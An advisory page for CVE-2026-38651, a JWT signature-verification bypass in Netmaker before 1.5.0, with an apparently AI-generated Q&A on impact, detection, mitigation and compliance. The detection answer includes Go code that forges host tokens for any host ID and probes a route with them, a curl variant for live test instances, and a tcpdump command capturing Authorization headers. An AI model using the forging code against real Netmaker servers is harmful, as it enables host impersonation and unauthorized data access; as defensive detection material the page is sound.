CVE-2026-38651
Authentication Bypass in Netmaker JWT Allows Host Impersonation
Publication date: 2026-04-28
Last updated on: 2026-04-28
Assigner: MITRE
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Affected versions |
|---|---|---|
| netmaker | netmaker | all versions before 1.5.0 (1.5.0 itself is not affected) |
| gravitl | netmaker | all versions before 1.5.0 (1.5.0 itself is not affected) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-347 | The product does not verify, or incorrectly verifies, the cryptographic signature for data. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-38651 is an authentication bypass in Netmaker versions prior to 1.5.0 (CWE-347, improper verification of a cryptographic signature). The flaw is in the VerifyHostToken function in logic/jwts.go, which does not properly validate the signature of the JWT host tokens it is handed.
Because the signature is never checked against the server's own signing key, an attacker can mint a JWT that names any host in the network, sign it with a key of their own choosing, and present it to the API endpoints that accept host tokens; the server treats it as a legitimate host token.
The attacker can therefore act as that host toward the API and read whatever the impersonated host is permitted to read.
How can this vulnerability impact me?
An attacker who can reach the Netmaker API bypasses host authentication entirely by forging a JWT host token; no stolen credential is needed, because any key the attacker chooses will do.
They can then impersonate any host in the Netmaker network: read the data the API exposes to that host and potentially alter network state or data in that host's name.
This compromises the confidentiality and integrity of the network and its data.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability is improper validation of JWT host tokens in Netmaker versions prior to 1.5.0, so the first check is simply which version you run.
Check the version of the Netmaker server: if it is older than 1.5.0 it is affected, regardless of anything you observe in traffic.
Inspecting traffic helps with spotting abuse rather than the flaw itself: monitor requests to Netmaker API endpoints that require host-token authorization and look at the Authorization headers for tokens that do not match any host the server issued one to.
Suggested commands include:
- Check the Netmaker version: `netmaker --version` if your build supports it, or inspect the tag of the deployed container image.
- Capture traffic to the Netmaker API and filter for Authorization headers: `tcpdump -i <interface> -A port <netmaker_api_port> | grep Authorization`. This only works where the API is reachable in plaintext (for example between a TLS-terminating reverse proxy and the server); on the TLS side you see nothing, so log the header at the proxy instead.
- Decode captured tokens locally with a JWT tool such as `jwt-cli`. Do not paste real tokens into online decoders: a host token is a credential. Decoding shows the header and claims (alg, host identity) but proves nothing about whether the server verified the signature.
The decisive check is active: in a test instance, present a host token signed with a key you generated yourself to a host-authenticated endpoint. If the server answers as though the token were valid instead of rejecting it, that instance is vulnerable.
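The mechanics behind both the flaw described in the first answer and the active check just described, as an added Go example that is not Netmaker's code: a minimal HS256 JWT signer, a verifier that models CWE-347 (it decodes the claims and never checks the signature) beside a hardened one that pins the algorithm and recomputes the HMAC under the server key, and a probe that sends a token for an arbitrary host ID, signed with a freshly generated key, to a host-authenticated route. The claim set (`host_id`), the `/api/hosts` path, the server key and every function name here are assumptions for illustration; Netmaker's real host token claims, routes and VerifyHostToken implementation differ, and this example uses only the standard library rather than Netmaker's JWT dependency.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// hostClaims is an assumed, simplified claim set; Netmaker's real host token differs.
type hostClaims struct{ HostID string `json:"host_id"` }
var b64 = base64.RawURLEncoding

// signHS256 builds a compact JWT (header.payload.signature) with HMAC-SHA256 under key.
func signHS256(c hostClaims, key []byte) string {
	payload, _ := json.Marshal(c)
	input := b64.EncodeToString([]byte(`{"alg":"HS256","typ":"JWT"}`)) + "." + b64.EncodeToString(payload)
	mac := hmac.New(sha256.New, key)
	mac.Write([]byte(input))
	return input + "." + b64.EncodeToString(mac.Sum(nil))
}

// forgeHostToken is the attacker's step: claim any host ID, sign with a key the server has never seen.
func forgeHostToken(hostID string) string {
	attackerKey := make([]byte, 32)
	rand.Read(attackerKey) // crypto/rand; an attacker-chosen key, unknown to the server
	return signHS256(hostClaims{HostID: hostID}, attackerKey)
}

// hostIDFromPayload decodes the claims segment; decoding proves nothing about who signed it.
func hostIDFromPayload(seg string) (string, error) {
	var c hostClaims
	raw, err := b64.DecodeString(seg)
	if err == nil {
		err = json.Unmarshal(raw, &c)
	}
	return c.HostID, err
}

// verifyHostTokenVulnerable models CWE-347: claims are trusted, the signature is never checked.
func verifyHostTokenVulnerable(token string, _ []byte) (string, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return "", errors.New("malformed token")
	}
	return hostIDFromPayload(parts[1])
}

// verifyHostTokenFixed pins alg and recomputes the HMAC under the server key (constant-time compare) first.
func verifyHostTokenFixed(token string, key []byte) (string, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return "", errors.New("malformed token")
	}
	hdr, err := b64.DecodeString(parts[0])
	var h struct{ Alg string `json:"alg"` }
	if err != nil || json.Unmarshal(hdr, &h) != nil || h.Alg != "HS256" {
		return "", errors.New("unexpected alg")
	}
	sig, err := b64.DecodeString(parts[2])
	mac := hmac.New(sha256.New, key)
	mac.Write([]byte(parts[0] + "." + parts[1]))
	if err != nil || !hmac.Equal(sig, mac.Sum(nil)) {
		return "", errors.New("bad signature")
	}
	return hostIDFromPayload(parts[1])
}

// hostHandler stands in for a host-authenticated route: 401 unless verify accepts the bearer token.
func hostHandler(verify func(string, []byte) (string, error), key []byte) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		id, err := verify(strings.TrimPrefix(r.Header.Get("Authorization"), "Bearer "), key)
		if err != nil {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		fmt.Fprintf(w, "hello host %s", id)
	})
}

// probeForgedToken is the detection check: send a forged token; true means 200 (vulnerable), not 401.
func probeForgedToken(route http.Handler) bool {
	req := httptest.NewRequest(http.MethodGet, "/api/hosts", nil) // path is assumed
	req.Header.Set("Authorization", "Bearer "+forgeHostToken("victim-host"))
	rec := httptest.NewRecorder()
	route.ServeHTTP(rec, req)
	return rec.Code == http.StatusOK
}

// demo probes a route behind each verifier and returns (acceptedByVulnerable, acceptedByFixed).
func demo() (bool, bool) {
	key := []byte("server-side-secret-assumed-for-demo")
	return probeForgedToken(hostHandler(verifyHostTokenVulnerable, key)), probeForgedToken(hostHandler(verifyHostTokenFixed, key))
}
```

`demo()` returns (true, false): the forged token is accepted by the CWE-347 verifier and rejected by the fixed one. Against a real test instance the check is the same request `probeForgedToken` builds, sent over the wire (for example with curl and `-H "Authorization: Bearer <token from forgeHostToken>"`) to a host-authenticated endpoint: a 200 where a 401 is expected is the vulnerable behaviour. Run it only against an instance you own, never production; a passive decode of captured tokens cannot give you this answer.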
What immediate steps should I take to mitigate this vulnerability?
The primary mitigation is to upgrade Netmaker to version 1.5.0 or later, where VerifyHostToken validates the host token signature correctly.
If an immediate upgrade is not possible, restrict network access to the Netmaker API endpoints to trusted hosts only, using segmentation and firewall rules, so that an unauthenticated attacker cannot reach them; this reduces exposure but does not fix the flaw.
Review API logs for requests authenticated with host tokens that do not correspond to a known host, or that arrive from addresses a host would not use.
Plan and test the upgrade in a staging environment before rolling it out, since it changes how every host's API calls are authorized.
After upgrading, confirm the fix the same way you would detect the flaw: a host token signed with a key the server does not hold must be rejected.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The vulnerability lets an attacker impersonate any host in the network by forging JWT host tokens and so gain unauthorized access to sensitive information without holding any credential.
Where that information includes personal or health data, such access conflicts with data protection regulations like GDPR and HIPAA, which require strict access controls and protection of personal and sensitive information.
Because the bypass defeats the authentication mechanism itself, running an affected version means a required access control is not functioning, which can expose confidential data and violate regulatory requirements for data security and privacy.